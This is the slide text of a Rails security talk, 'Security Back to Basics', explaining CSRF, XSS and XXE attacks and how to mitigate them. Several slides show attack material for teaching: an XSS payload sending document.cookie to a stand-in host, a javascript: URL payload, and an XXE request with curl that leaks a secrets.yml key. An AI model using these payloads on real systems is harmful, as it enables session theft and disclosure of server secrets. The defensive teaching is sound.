Slide 1

Slide 1 text

SECURITY Back to Basics

Slide 2

Slide 2 text

No content

Slide 3

Slide 3 text

EILEEN M. UCHITELLE ! eileencodes.com " @eileencodes # @eileencodes ! speakerdeck.com/eileencodes

Slide 4

Slide 4 text

Kingston, NY Pittsburgh, PA

Slide 5

Slide 5 text

Kingston, NY Pittsburgh, PA Canada Buffalo, NY

Slide 6

Slide 6 text

Security, Infrastructure & Performance Team at Basecamp

Slide 7

Slide 7 text

OPEN SOURCE Rails Committers Rails Security

Slide 8

Slide 8 text

No content

Slide 9

Slide 9 text

No content

Slide 10

Slide 10 text

How is security broken?

Slide 11

Slide 11 text

• Impossible to test for all possible vulnerabilities How is security broken?

Slide 12

Slide 12 text

• Impossible to test for all possible vulnerabilities • Hackers are always one step ahead How is security broken?

Slide 13

Slide 13 text

• Impossible to test for all possible vulnerabilities • Hackers are always one step ahead • Patching one vulnerability can lead to exposing new ones How is security broken?

Slide 14

Slide 14 text

How did we get here?

Slide 15

Slide 15 text

• Failed to enforce web standards How did we get here?

Slide 16

Slide 16 text

vs.

Slide 17

Slide 17 text

No content

Slide 18

Slide 18 text

• Failed to enforce web standards • Failed to implement a deﬁnition of security How did we get here?

Slide 19

Slide 19 text

“...completely failed to come up with even the most rudimentary usable frameworks for understanding the security of modern software.” – Michal Zalewski, The Tangled Web

Slide 20

Slide 20 text

• Failed to enforce web standards • Failed to implement a deﬁnition of security • Too few people understand the vulnerabilities How did we get here?

Slide 21

Slide 21 text

No content

Slide 22

Slide 22 text

CSRF

Slide 23

Slide 23 text

CSRF Cross-Site Request Forgery

Slide 24

Slide 24 text

EXPLOITING CSRF

Slide 25

Slide 25 text

No content

Slide 26

Slide 26 text

ARYA The User

Slide 27

Slide 27 text

JESSIE The Hacker ARYA The User

Slide 28

Slide 28 text

No content

Slide 29

Slide 29 text

No content

Slide 30

Slide 30 text

Name Email Website

Slide 31

Slide 31 text

No content

Slide 32

Slide 32 text

Looks the same, different URL

Slide 33

Slide 33 text

Name Email Website

Slide 34

Slide 34 text

Name Email Website Jessie’s email

Slide 35

Slide 35 text

Name Email Website Auto-submit form

Slide 36

Slide 36 text

Name Email Website Auto-submit form to victim site

Slide 37

Slide 37 text

Jessie’s email

Slide 38

Slide 38 text

How dangerous are CSRF attacks?

Slide 39

Slide 39 text

How can we protect  our users from  CSRF attacks?

Slide 40

Slide 40 text

• Use built-in framework CSRF protection How to mitigate CSRF?

Slide 41

Slide 41 text

No content

Slide 42

Slide 42 text

class ApplicationController < ActionController::Base protect_from_forgery with: :exception end

Slide 43

Slide 43 text

Name Email Website CSRF protection

Slide 44

Slide 44 text

Caveat: CSRF protection in Rails is order-dependent

Slide 45

Slide 45 text

class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end

Slide 46

Slide 46 text

class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end Conditional authentication

Slide 47

Slide 47 text

class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end class ChatsController < ApplicationController skip_before_action :authenticate before_action :authenticate_for_chat, only: :create end

Slide 48

Slide 48 text

Slide 49

Slide 49 text

>> ChatsController._process_action_callbacks.map(&:filter) =>[ :authenticate, :verify_authenticity_token, :authenticate_for_chat ] Authentication callback is too late in the chain

Slide 50

Slide 50 text

class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end class ChatsController < ActionController::Base skip_before_action :authenticate before_action :authenticate_for_chat, only: :create protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end

Slide 51

Slide 51 text

>> ChatsController._process_action_callbacks.map(&:filter) =>[ :authenticate, :authenticate_for_chat, :verify_authenticity_token ] Corrected callback order

Slide 52

Slide 52 text

No content

Slide 53

Slide 53 text

• Use built-in framework CSRF protection • Refresh tokens with the session / don’t reuse tokens How to mitigate CSRF?

Slide 54

Slide 54 text

class SessionsController < ApplicationController def destroy sign_out reset_session redirect_to sign_in_url end end Refreshes Authenticity Token

Slide 55

Slide 55 text

• Use built-in framework CSRF protection • Refresh tokens with the session / don’t reuse tokens • Mitigate XSS attacks How to mitigate CSRF?

Slide 56

Slide 56 text

XSS

Slide 57

Slide 57 text

XSS Cross-Site Scripting

Slide 58

Slide 58 text

EXPLOITING STORED XSS

Slide 59

Slide 59 text

No content

Slide 60

Slide 60 text

document.write( '<img src=“http://www.hax0rcats.com/' + document.cookie + '">' ); automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To

Slide 61

Slide 61 text

No content

Slide 62

Slide 62 text

Escaped HTML

Slide 63

Slide 63 text

Profile

<%= notice %>

Name: <%= @user.name %>

Email: <%= @user.email %>

Website: <%= link_to('website', @user.website) %>

<%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %>

Slide 64

Slide 64 text

Profile

<%= notice %>

Name: <%= (@user.name).html_safe %>

Email: <%= @user.email %>

Website: <%= link_to('website', @user.website) %>

<%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %> automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To

Slide 65

Slide 65 text

No content

Slide 66

Slide 66 text

JavaScript Scheme

Slide 67

Slide 67 text

No content

Slide 68

Slide 68 text

javascript://example.com/%0Aalert(1)

Slide 69

Slide 69 text

example.com/%0Aalert(1) JavaScript Scheme javascript://

Slide 70

Slide 70 text

javascript://example.com/%0Aalert(1) URL example.com

Slide 71

Slide 71 text

Percent encoded “line feed” javascript://example.com/%0Aalert(1) %0A

Slide 72

Slide 72 text

JavaScript Alert javascript://example.com/%0Aalert(1) alert(1)

Slide 73

Slide 73 text

How dangerous are XSS attacks?

Slide 74

Slide 74 text

How can we protect  our users from  XSS attacks?

Slide 75

Slide 75 text

• Always escape user-provided data How to mitigate XSS?

Slide 76

Slide 76 text

Profile

<%= notice %>

Name: <%= (@user.name).html_safe %>

Email: <%= @user.email %>

Website: <%= link_to('website', @user.website) %>

<%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %> Don’t do this

Slide 77

Slide 77 text

No content

Slide 78

Slide 78 text

• Don’t HTML escape user-provided data • Sanitize user-provided data How to mitigate XSS?

Slide 79

Slide 79 text

Profile

<%= notice %>

Name: <%= sanitize(@user.name) %>

Email: <%= @user.email %>

Website: <%= link_to('website', @user.website) %>

<%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %> Will strip out unwanted tags and attributes

Slide 80

Slide 80 text

• Don’t HTML escape user-provided data • Sanitize user-provided data • Validate user-provided data How to mitigate XSS?

Slide 81

Slide 81 text

class User < ActiveRecord::Base WHITELISTED_URI_SCHEMES = %w( http https ) validate :check_uri_scheme private def check_uri_scheme begin uri = URI.parse(website) unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase) errors.add :website, 'is not an allowed URI scheme' end rescue URI::InvalidURIError errors .add :website, 'is not a valid URI' end end end

Slide 82

Slide 82 text

Slide 83

Slide 83 text

Slide 84

Slide 84 text

XXE

Slide 85

Slide 85 text

XXE XML eXternal Entity Attack

Slide 86

Slide 86 text

]> Take a nap Go on a long walk with my hooman &ext1; Take another nap Go to bed

Slide 87

Slide 87 text

]> Take a nap Go on a long walk with my hooman &ext1; Take another nap Go to bed Entity reference

Slide 88

Slide 88 text

Eat breakfast Bark at the mail carrier

Slide 89

Slide 89 text

Take a nap Go on a long walk with my hooman Eat breakfast Bark at the mail carrier Take another nap Go to bed

Slide 90

Slide 90 text

EXPLOITING XXE

Slide 91

Slide 91 text

class UsersController < ApplicationController def create @user = User.new(user_params) respond_to do |format| if @user.save format.html { redirect_to @user } format.xml { render :xml => @user.to_xml } else format.html { render :new } format.xml { render xml: @user.errors.to_xml } end end end end

Slide 92

Slide 92 text

Slide 93

Slide 93 text

]> &name;

Slide 94

Slide 94 text

]> &name; Requested ﬁle

Slide 95

Slide 95 text

]> &name; Entity reference

Slide 96

Slide 96 text

curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml POST request to users create

Slide 97

Slide 97 text

curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml Payload

Slide 98

Slide 98 text

curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml ... production: secret_key_base: 271a389cf7bf7b4ff18af3e809241603802b5ff1617b5432a41ff0f99d5 f29c897db7f07a9cebd9e3a3535301720c0b19ac4eb82afa505ed229c40 00e166a9a5 ... secrets.yml as user’s name

Slide 99

Slide 99 text

No content

Slide 100

Slide 100 text

How dangerous are XXE attacks?

Slide 101

Slide 101 text

No content

Slide 102

Slide 102 text

How can we protect  our servers from  XXE attacks?

Slide 103

Slide 103 text

• Don’t parse XML How to mitigate XXE?

Slide 104

Slide 104 text

Don’t parse XML

Slide 105

Slide 105 text

• Don’t parse XML • Don’t use parsers that allow entity replacement (LibXML) How to mitigate XXE?

Slide 106

Slide 106 text

>> LibXML::XML.default_substitute_entities >> true

Slide 107

Slide 107 text

• Don’t parse XML • Don’t use parsers that allow entity replacement (LibXML) • Whitelist known entities How to mitigate XXE?

Slide 108

Slide 108 text

Investigate vulnerabilities & patches SECURITY

Slide 109

Slide 109 text

GitHub  eileencodes/security_examples

Slide 110

Slide 110 text

owasp.org

Slide 111

Slide 111 text

No content

Slide 112

Slide 112 text

Brakeman

Slide 113

Slide 113 text

Resilience & empowerment SECURITY

Slide 114

Slide 114 text

No content

Slide 115

Slide 115 text

Awareness of vulnerabilities SECURITY

Slide 116

Slide 116 text

JESSIE The Hacker ARYA The User

Slide 117

Slide 117 text

No content

Slide 118

Slide 118 text

To the future

Slide 119

Slide 119 text

Thank You! Come ﬁnd me for questions and Basecamp stickers

Slide 120

Slide 120 text

EILEEN M. UCHITELLE Security, Infrastructure & Performance Team at Basecamp ! eileencodes.com " @eileencodes # @eileencodes ! speakerdeck.com/eileencodes